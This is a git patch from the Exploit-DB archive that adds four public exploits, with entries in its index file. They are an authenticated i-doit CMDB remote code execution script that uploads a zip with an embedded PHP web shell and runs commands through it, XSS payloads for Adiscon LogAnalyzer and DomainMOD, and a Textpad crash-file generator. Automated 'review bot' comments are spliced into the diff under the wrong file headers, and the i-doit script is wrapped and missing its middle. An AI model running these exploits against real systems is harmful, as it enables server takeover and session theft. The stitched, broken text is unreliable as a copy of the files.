From c49a1520f12a1a82008905b0c23e61cf0406096c Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Mon, 10 Dec 2018 05:01:40 +0000
Subject: [PATCH] DB: 2018-12-10 4 changes to exploits/shellcodes

Textpad 8.1.2 - Denial Of Service (PoC)
i-doit CMDB 1.11.2 - Remote Code Execution
Adiscon LogAnalyzer 4.1.7 - Cross-Site Scripting
DomainMOD 4.11.01 - 'DisplayName' Cross-Site Scripting

---
 exploits/php/webapps/45957.py | 105 ++++++++++++++++++++++++++++++
 exploits/php/webapps/45958.txt | 22 +++++++
 exploits/php/webapps/45959.txt | 16 +++++
 exploits/windows_x86/dos/45956.py | 25 +++++++
 files_exploits.csv | 4 ++
 5 files changed, 172 insertions(+)
 create mode 100755 exploits/php/webapps/45957.py
 create mode 100644 exploits/php/webapps/45958.txt
 create mode 100644 exploits/php/webapps/45959.txt
 create mode 100755 exploits/windows_x86/dos/45956.py

diff --git a/exploits/php/webapps/45957.py b/exploits/php/webapps/45957.py
new file mode 100755
index 000000000..3e64456af
--- /dev/null
+++ b/exploits/php/webapps/45957.py
@@ -0,0 +1,105 @@ +# Exploit Title: i-doit CMDB 1.11.2 - Remote Code Execution +# Date: 2018-12-05 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Contact: https://pentest.com.tr +# Vendor Homepage: https://www.i-doit.org/ +# Software Link: https://www.i-doit.org/i-doit-open-1-11-2/ +# Version: v1.11.2 +# Category: Webapps +# Tested on: XAMPP for Linux 5.6.38-0 +# Software Description : The IT-documentation solution i-doit is based on a +# complete open +# source configuration management and database. Using i-doit as a CMDB you +# can manage your IT according to ITIL best practices and configurate the significant +# components of your IT environment +# Description : This application has an upload feature that allows an +# authenticated user with administrator +# roles to upload arbitrary files to the main website directory. +# ================================================================== +# PoC: Exploit upload the ".php" file in the ".zip" file to Remote Code Execution. +# i-doit accepts zip files as a plugin and extract them to the main +# directory. 
In order for the ".zip" file to be accepted by the application, it must +# contain a file named "package.json + +#!/usr/bin/python + +import mechanize +import sys +import cookielib +import requests +import colorama +from colorama import Fore + +print +"\n############################################################################" +print "# i-doit CMDB & ITSM 1.11.2 Remote Code Execution - Remote Code Execution #" +print "# Vulnerability discovered byvAkkuS #" +print "# My Blog - https://www.pentest.com.tr #" +print +"############################################################################\n" +if (len(sys.argv) != 2): + print "[*] Usage: poc.py " + exit(0) + +rhost = sys.argv[1] + +# User Information Input +UserName = str(raw_input("User Name: ")) +Password = str(raw_input("Password: ")) + +# Login into site +print(Fore.BLUE + "+ [*] Loging in...") +br = mechanize.Browser() +br.set_handle_robots(False) + +# Cookie Jar +cj = cookielib.LWPCookieJar() +br.set_cookiejar(cj) + +br.open("http://"+rhost+"/admin/") +assert br.viewing_html() +br.select_form(nr=0) +br.form['username'] = UserName +br.form['password'] = Password +br.submit() + +title = br.title() +print (Fore.YELLOW + "+ [*] You're in "+title+" section of the app now") + +# Arbitrary ".php" File Upload Records with multipart/form-data to RCE +rce_headers = {"Accept": +"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", +"Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", +"Content-Type": "multipart/form-data; +boundary=---------------------------13859713751632544601258659337"} +rce_data="-----------------------------13859713751632544601258659337\r\nContent-Disposition: +form-data; +name=\"action\"\r\n\r\nadd\r\n-----------------------------13859713751632544601258659337\r\nContent-Disposition: +form-data; +name=\"mandator\"\r\n\r\n0\r\n-----------------------------13859713751632544601258659337\r\nContent-Disposition: +form-data; name=\"module_file\"; 
filename=\"test.zip\"\r\nContent-Type: +application/zip\r\n\r\nPK\x03\x04\x14\x00\x08\x00\x08\x00\x06\x89\x85M\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00 +\x00package.jsonUT\r\x00\x07\xcc\xdb\x07\\\xcc\xdb\x07\\\xcc\xdb\x07\\ux\x0b\x00\x01\x04\x00\x00\x00\x00\x04\x00\x00\x00\x00\x03\x00PK\x07\x08\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00PK\x03\x04\x14\x00\x08\x00\x08\x00G\x87{M\x00\x00\x00\x00\x00\x00\x00\x00\xdc\x01\x00\x00\t\x00 +\x00shell.phpUT\r\x00\x07wM\xfd[7\x81\x07\\wM\xfd[ux\x0b\x00\x01\x04\x00\x00\x00\x00\x04\x00\x00\x00\x00\x95\x91\xcbj\xc30\x10E\xf7\xfa\x8a\xc1\x18,\xd3\xe6\x0b\xd2G6I)d\x15\xb2+e\x10\xf2\xb8\x16\xd1#x\xe4<\x08\xf9\xf7:\x8d\xe3\xb8M\xbb\xe8JH\xf7\xce\xbdg\xd0\xc3\xf3\xbaZ\x8b4V\x86\xb14\x96\xe0\x11\x10g\xaf\xf3)\xe2XLx\xcf\x91\x9cLt\xe5B\x01\xcdG\x18m\xe1\xeaM\xf2o\x16\x15c\rw\xe6\x87!\xd5\xc19\xe5\x8b68\xc5\x97\xe9\xf2-\xd1\xaeH\xde\xc7B\x98\x12\xa4\xb6\x8a\x19ig8\xb2\xcc\x16TZ\xd2\xd1\x04?k\xfc\xd7\x99\xe59\x1c\x84\x00\x80\xb4\xec\x9e\xda +O[\xb8\xf5\xca\xec\xcc\x92\xb5\xad\xc3\x81\xd1\x93\xf1\x9b\xb0\"yAiuq\x04\xb2L'\x84\x8b\xad\xa7\xd0\xcaZl\x98j ")) + URL = requests.get("http://"+rhost+"/shell.php?cmd="+Command+"") + print URL.text + else: + print (Fore.RED + "+ [X] Unable to upload or access the shell") + sys.exit() + +# end \ No newline at end of file diff --git a/exploits/php/webapps/45958.txt b/exploits/php/webapps/45958.txt new file mode 100644 index 000000000..4f338a81e --- /dev/null +++ b/exploits/php/webapps/45958.txt 
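Review bot: The argument check `if (len(sys.argv) != 2): print "[*] Usage: poc.py "` prints a usage line with no argument name, so the user gets no hint that a host is expected, and `exit(0)` reports success on a misuse; `print "[*] Usage: poc.py <host>"` followed by `sys.exit(1)` would fix both. The line `assert br.viewing_html()` uses an assertion as a runtime check, which is stripped under `python -O`; an explicit `if not br.viewing_html(): sys.exit(1)` keeps the check in every mode. Several `+` markers in this hunk fall mid-statement (after `print` before the banner string, and inside the `Content-Type` header value and the `rce_data` literal), which suggests the file was line-wrapped when it was added and may not parse as committed — worth confirming against the stored file; the middle of the hunk is also not visible here, so the handling of the upload response could not be reviewed.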
@@ -0,0 +1,22 @@
+# Exploit Title: Adiscon LogAnalyzer 4.1.7 - Cross-Site Scripting
+# Date: 2018-12-05
+# Software Link: *httpås://loganalyzer.adiscon.com/
+# https://github.com/rsyslog/loganalyzer
+# *
+# Exploit Author: Gustavo Sorondo
+# Contact: http://twitter.com/iampuky
+# Website: http://cintainfinita.com/
+# CVE: CVE-2018-19877
+# Category: webapps
+
+# 1. Description
+# Adiscon LogAnalyzer before 4.1.7 is affected by Cross-Site Scripting (XSS)
+# in the 'referer' parameter of the login.php file.
+
+# 2. Proof of Concept
+
+http://my.loganalyzer.instance/login.php?referer=%22%3E%3Cscript%3Ealert('Cinta%20Infinita')%3C/script%3E
+
+# 3. Solution:
+# Update to version 4.1.7.
+# https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/
\ No newline at end of file
diff --git a/exploits/php/webapps/45959.txt b/exploits/php/webapps/45959.txt
new file mode 100644
index 000000000..7eef35308
--- /dev/null
+++ b/exploits/php/webapps/45959.txt
@@ -0,0 +1,16 @@
+# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
+# Date: 2018-11-22
+# Exploit Author: Mohammed Abdul Raheem
+# Vendor Homepage: domainmod (https://domainmod.org/)
+# Software Link: domainmod (https://github.com/domainmod/domainmod)
+# Version: v4.09.03 to v4.11.01
+# CVE : CVE-2018-19892
+
+# A Stored Cross-site scripting (XSS) was discovered in DomainMod application
+# versions from v4.09.03 to v4.11.01
+# (https://github.com/domainmod/domainmod/issues/85)
+# After logging into the Domainmod application panel, browse to the
+# /admin/dw/add-server.php page and inject a javascript XSS payload in
+# DisplayName, Username & host name fields
+
+">
\ No newline at end of file
diff --git a/exploits/windows_x86/dos/45956.py b/exploits/windows_x86/dos/45956.py
new file mode 100755
index 000000000..c37c58b6b
--- /dev/null
+++ b/exploits/windows_x86/dos/45956.py
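Review bot: The header `# Exploit Title: Adiscon LogAnalyzer 4.1.7 - Cross-Site Scripting` names 4.1.7 as the affected version, while the description says versions before 4.1.7 are affected and the solution is to update to 4.1.7, so the title contradicts the body and will mislead anyone triaging by version; `# Exploit Title: Adiscon LogAnalyzer < 4.1.7 - Cross-Site Scripting` would match the text. The `Software Link` line also carries a garbled scheme, `*httpås://loganalyzer.adiscon.com/`, which should read `https://loganalyzer.adiscon.com/`.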
@@ -0,0 +1,25 @@
+# Exploit Title: Textpad 8.1.2 - Denial Of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-12-06
+# Homepage: https://textpad.com
+# Software Link: https://www.textpad.com/download/v81/win32/txpeng812-32.zip
+# Tested Version: 8.1.2
+# Tested on OS: Windows 7 32-bit
+# Steps to Reproduce: Run the python exploit script, it will create a new
+# file with the name "exploit.txt" just copy the text inside "exploit.txt"
+# and start the program. In the new window click "Tools" > "Run...". Now paste the content of
+# "exploit.txt" into the fields:"Command". Click "OK" and you will see a crash.
+
+#!/usr/bin/python
+
+buffer = "A" * 5000
+
+payload = buffer
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 015cb11be..163a32885 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
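Review bot: The bare `except:` around the file write catches every exception, including KeyboardInterrupt and SystemExit, and reports only a generic message, so a real permission or disk error is indistinguishable from a user abort; narrowing it to `except IOError as e:` and printing `e` keeps the failure visible. The handle is also left open when `f.write(payload)` raises, because `f.close()` is only reached on the success path; `with open("exploit.txt", "w") as f: f.write(payload)` closes it on every path and makes the explicit `f.close()` unnecessary. The header comment has a typo, `# Discovey Date:`, which should read `# Discovery Date:`.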
@@ -6207,6 +6207,7 @@ id,file,description,date,author,type,platform,port
 45936,exploits/windows/dos/45936.ps1,"Microsoft Lync for Mac 2011 - Injection Forced Browsing/Download",2018-12-04,nyxgeek,dos,windows,
 45950,exploits/multiple/dos/45950.txt,"Wireshark - 'cdma2k_message_ACTIVE_SET_RECORD_FIELDS' Stack Corruption",2018-12-04,"Google Security Research",dos,multiple,
 45951,exploits/multiple/dos/45951.txt,"Wireshark - 'find_signature' Heap Out-of-Bounds Read",2018-12-04,"Google Security Research",dos,multiple,
+45956,exploits/windows_x86/dos/45956.py,"Textpad 8.1.2 - Denial Of Service (PoC)",2018-12-09,"Gionathan Reale",dos,windows_x86,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -40454,3 +40455,6 @@ id,file,description,date,author,type,platform,port
 45949,exploits/php/webapps/45949.txt,"DomainMOD 4.11.01 - Registrar Cross-Site Scripting",2018-12-04,"Mohammed Abdul Raheem",webapps,php,80
 45954,exploits/php/webapps/45954.txt,"FreshRSS 1.11.1 - Cross-Site Scripting",2018-12-04,Netsparker,webapps,php,80
 45955,exploits/php/webapps/45955.txt,"HasanMWB 1.0 - SQL Injection",2018-12-05,"Ihsan Sencan",webapps,php,80
+45957,exploits/php/webapps/45957.py,"i-doit CMDB 1.11.2 - Remote Code Execution",2018-12-09,AkkuS,webapps,php,
+45958,exploits/php/webapps/45958.txt,"Adiscon LogAnalyzer 4.1.7 - Cross-Site Scripting",2018-12-09,"Gustavo Sorondo",webapps,php,
+45959,exploits/php/webapps/45959.txt,"DomainMOD 4.11.01 - 'DisplayName' Cross-Site Scripting",2018-12-09,"Mohammed Abdul Raheem",webapps,php,